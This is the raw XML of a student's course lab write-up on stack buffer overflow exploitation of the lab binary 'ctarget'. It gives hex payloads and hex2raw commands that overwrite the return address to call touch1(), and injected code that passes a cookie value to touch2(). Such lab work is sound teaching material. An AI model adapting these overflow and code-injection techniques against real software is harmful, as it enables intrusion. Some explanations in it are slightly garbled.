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BD8DF" w14:textId="14822413" w:rsidR="00330553" w:rsidRPr="006D5067" w:rsidRDefault="00E545F5" w:rsidP="00E545F5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2484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6D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Attack lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20465603" w14:textId="6F3B99A2" w:rsidR="00330553" w:rsidRPr="006D5067" w:rsidRDefault="00330553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p w14:paraId="4BD7FD8E" w14:textId="5C81CE1E" w:rsidR="00E545F5" w:rsidRPr="006D5067" w:rsidRDefault="00E545F5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Attack lab is a gist about finding the vulnerabilities of the system, </w:t>
      </w:r>
      <w:r w:rsidR="00FC4EC3" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">and attack it such that the system fails causing wrong calls to functions or giving wrong output. </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r w:rsidR="004E0579" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">We used hex2raw.exe and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E0579" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ctarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E0579" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create an object</w:t>
      </w:r>
      <w:r w:rsidR="008E439C" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E0579" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">dump file. We then used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E0579" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ctarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E0579" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find the address of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E0579" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>get_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004E0579" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>buff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E0579" w:rsidRPr="006D5067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="004E0579" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>) and touch1() to understand the assembl</w:t>
      </w:r>
      <w:r w:rsidR="008E439C" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="004E0579" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> language commands.</w:t>
      </w:r>
      <w:r w:rsidR="008E439C" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="7ACD2EE2" w14:textId="0381F28F" w:rsidR="002E7917" w:rsidRPr="006D5067" w:rsidRDefault="002E7917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B0730BC" wp14:editId="1121A583">
            <wp:simplePos x="914400" y="2324100"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="1805940" cy="19964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E91" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A3C3FE" w14:textId="3E0113BE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According to the address from the assembly language 40 bytes are allocated for stack. The next 8 bytes are allocated for the return address. To cause the attack we are finding the vulnerability that, if we send 40 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>bytes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 xml:space="preserve"> we fill the stack, but if we send more that 4 bytes, it causes a segmentation error. By sending the address of the function we want to execute in place of the extra 8 bytes, causes to replace the return address with the wrong address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5F2D0D" w14:textId="295DC5F1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For this we are creating a text file sending the 40 bytes data along with the next 8 bytes address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0190C18C" w14:textId="3C775C25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00 00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668D3E2A" w14:textId="77777777" w:rsidR="008E439C" w:rsidRPr="006D5067" w:rsidRDefault="008E439C" w:rsidP="008E439C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00 00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127E5299" w14:textId="77777777" w:rsidR="008E439C" w:rsidRPr="006D5067" w:rsidRDefault="008E439C" w:rsidP="008E439C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00 00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1333751A" w14:textId="77777777" w:rsidR="008E439C" w:rsidRPr="006D5067" w:rsidRDefault="008E439C" w:rsidP="008E439C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00 00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38201ECB" w14:textId="77777777" w:rsidR="008E439C" w:rsidRPr="006D5067" w:rsidRDefault="008E439C" w:rsidP="008E439C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00 00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A47E08C" w14:textId="30053063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C0 17 40 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521E2606" w14:textId="40CA449F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lastRenderedPageBreak/>
        <w:t xml:space="preserve">We then execute the command with hex2raw. </w:t>
      </w:r>
      <w:r w:rsidR="002E7917" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> The address we give matches the address in the stack and it assumes that the address is correct causing it to get attacked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB2BAFB" w14:textId="2743E5D0" w:rsidR="008E439C" w:rsidRPr="006D5067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6D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>./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>hex2raw &lt; output.txt | ./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ctarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E749078" w14:textId="2276E0B9" w:rsidR="00866E91" w:rsidRDefault="008E439C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This calls </w:t>
      </w:r>
      <w:r w:rsidR="003319E0" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>touch1().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4597DB72" w14:textId="6DCA6DC4" w:rsidR="006D5067" w:rsidRDefault="006D5067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p w14:paraId="09E1F1BE" w14:textId="3C03AB1D" w:rsidR="006D5067" w:rsidRDefault="006D5067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p w14:paraId="73C84E00" w14:textId="77777777" w:rsidR="006D5067" w:rsidRPr="006D5067" w:rsidRDefault="006D5067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p w14:paraId="68C7E090" w14:textId="7BD215F2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Phase-2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370C6715" w14:textId="77777777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Attacking the system with the vulnerability by calling another function using a parameter. We use </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>a .s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 xml:space="preserve"> file with an address returning the address stored in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> register. The cookie value is required to be passed as a parameter to the touch2() for execution. This returns a hexadecimal value for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>the .s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 xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A0E20B" w14:textId="7B88C58E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The vulnerability is in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>gets(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 xml:space="preserve">) as the cookie value required sending wrong to cause wrong function call. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>.s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 xml:space="preserve"> file containing the assembly code creates a .O file that is executable file.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490FD484" w14:textId="15AE0FBB" w:rsidR="004C6874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2047995" wp14:editId="59CA7989">
            <wp:extent cx="3223260" cy="2697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B04" w:rsidRPr="006D506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2D210A3" wp14:editId="2129ACC9">
            <wp:extent cx="2491105" cy="2666759"/>
            <wp:effectExtent l="0" t="0" r="444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616" cy="27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2BE3" w14:textId="77777777" w:rsidR="006D5067" w:rsidRPr="006D5067" w:rsidRDefault="006D5067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p w14:paraId="70079384" w14:textId="24DCA08A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Here also we create a target.txt file containing the values of 40 bytes with 16 bytes extra.</w:t>
      </w:r>
      <w:r w:rsidR="004C6874" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> The extra 16 bytes contains the return address for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004C6874" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="006D5067" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C6874" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>.s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004C6874" w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> file and then calling the touch2() with the returned value as argument.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0096EC17" w14:textId="11FAF033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lastRenderedPageBreak/>
        <w:t xml:space="preserve">48 c7 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>c7</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> fa 97 b9 59 c3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DD9FC1" w14:textId="50812F59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00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF8683A" w14:textId="77777777" w:rsidR="004C6874" w:rsidRPr="006D5067" w:rsidRDefault="004C6874" w:rsidP="004C6874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00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C36471" w14:textId="77777777" w:rsidR="004C6874" w:rsidRPr="006D5067" w:rsidRDefault="004C6874" w:rsidP="004C6874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00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F12822" w14:textId="77777777" w:rsidR="004C6874" w:rsidRPr="006D5067" w:rsidRDefault="004C6874" w:rsidP="004C6874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00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07024353" w14:textId="16B9F8CF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78 dc 61 55 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778AE175" w14:textId="1EB8BF80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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 17 40 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3097577C" w14:textId="79F4BF4A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 xml:space="preserve">We then execute this file with hex2raw. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5B6029" w14:textId="7D768435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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>hex2raw &lt; target.txt | ./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ctarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3532B2AC" w14:textId="6AA8AF81" w:rsidR="004C6874" w:rsidRPr="006D5067" w:rsidRDefault="004C6874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  <w:r w:rsidRPr="006D5067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>This calls touch2() with cookie value: 0x59b997fa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287061A8" w14:textId="77777777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p w14:paraId="27C10471" w14:textId="77777777" w:rsidR="00866E91" w:rsidRPr="006D5067" w:rsidRDefault="00866E91" w:rsidP="00330553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2484"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00866E91" w:rsidRPr="006D5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53"/>
    <w:rsid w:val="002E7917"/>
    <w:rsid w:val="00330553"/>
    <w:rsid w:val="003319E0"/>
    <w:rsid w:val="00335490"/>
    <w:rsid w:val="004C6874"/>
    <w:rsid w:val="004E0579"/>
    <w:rsid w:val="005B3C47"/>
    <w:rsid w:val="006873F7"/>
    <w:rsid w:val="006D5067"/>
    <w:rsid w:val="007A6B89"/>
    <w:rsid w:val="00866E91"/>
    <w:rsid w:val="008E439C"/>
    <w:rsid w:val="00C1439B"/>
    <w:rsid w:val="00E545F5"/>
    <w:rsid w:val="00F02B04"/>
    <w:rsid w:val="00FC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A7AA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B8396310-E53B-4980-BFB3-3E5A0434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Chundury</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Aiswarya Chundury</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-02-14T09:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-17T04:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>